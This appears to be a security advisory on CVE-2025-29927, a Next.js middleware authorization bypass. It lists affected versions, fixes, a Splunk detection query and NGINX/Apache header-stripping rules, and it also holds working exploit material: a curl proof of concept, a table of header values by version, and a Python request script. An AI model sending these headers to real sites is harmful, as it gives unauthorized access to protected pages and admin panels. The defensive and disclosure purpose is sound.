
A severe security flaw in Next.js, tracked as CVE-2025-29927, allows attackers to bypass authentication and authorization checks by manipulating HTTP headers. The vulnerability affects Next.js versions 11.1.4 through 15.2.2 and has been assigned a CVSS score of 9.1, indicating critical severity.
Key Takeaways for Security Teams
- Vulnerability: Attackers can bypass Next.js middleware security by injecting a malicious `x-middleware-subrequest` header.
- Impact: Unauthorized access to protected routes, admin panels, and sensitive data.
- Affected Versions: Next.js 11.1.4 to 15.2.2.
- Fix: Upgrade to Next.js 15.2.3+ or 14.2.25+.
- Workaround: Block the `x-middleware-subrequest` header at the web server level.
Technical Details
The vulnerability stems from the mechanism Next.js uses to limit middleware recursion. Middleware functions typically handle authentication, geo-blocking, and security headers. To stop middleware from invoking itself indefinitely on internal sub-requests, the framework tracks the depth in the `x-middleware-subrequest` header and skips middleware once that header lists the middleware's name at least as many times as the default recursion depth of 5. Affected versions honoured the header on external requests as well, so a client can supply it directly and have every middleware check skipped.
Proof of Concept (PoC)
```shell
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://vulnerable-site.com/admin
```
This request bypasses middleware entirely, granting access to restricted endpoints.
Exploit Variations by Next.js Version
Project Structure | Exploit Header Format
---|---
Pages Router (v11.1.4-12.1.x) | `x-middleware-subrequest: pages/_middleware`
App Router (v12.2.x-13.x) | `x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware`
App Router with /src (v14.x-15.2.2) | `x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware`
Attack Scenarios
- Authentication Bypass: Access admin dashboards without credentials.
- CSP Bypass: Disable security headers, enabling XSS attacks.
- Geo-Blocking Evasion: Bypass regional restrictions.
Detection and Mitigation
For Defenders
- Detection: Monitor logs for requests that carry an `x-middleware-subrequest` header. The header is set by the framework on its own internal sub-requests, so any occurrence on a request arriving from outside the application is abnormal. Example Splunk query:
```
index=web_logs "x-middleware-subrequest=*middleware*" | stats count by src_ip
```
- Mitigation: strip the header at the edge before it reaches the application.
  - NGINX:
```nginx
location / { proxy_set_header x-middleware-subrequest ""; }
```
  - Apache:
```apache
RequestHeader unset x-middleware-subrequest
```
For Security Researchers
A Python script demonstrating the exploit (for testing purposes only):
```python
import requests

# Placeholder target from the article; the header value is the App Router form
# from the table above.
target_url = "http://target.com/admin"
headers = {"x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"}

response = requests.get(target_url, headers=headers, timeout=10)
print(response.status_code)
print(response.text)
```
Conclusion
CVE-2025-29927 highlights the risks of relying solely on middleware for security. Immediate patching or header blocking is essential. Organizations using Next.js should also implement server-side authentication checks (e.g., NextAuth.js) as a defense-in-depth measure.
References
- Critical flaw in Next.js lets hackers bypass authorization. BleepingComputer.
- Critical Next.js Vulnerability Allows Attackers to Bypass Middleware. The Hacker News.
- CVE-2025-29927 – Understanding the Next.js Middleware Vulnerability. Strobes.
- Authorization Bypass in Next.js Middleware · CVE-2025-29927. GitHub Advisory Database.
- Next.js Middleware Vulnerability (CVE-2025-29927). SOCRadar.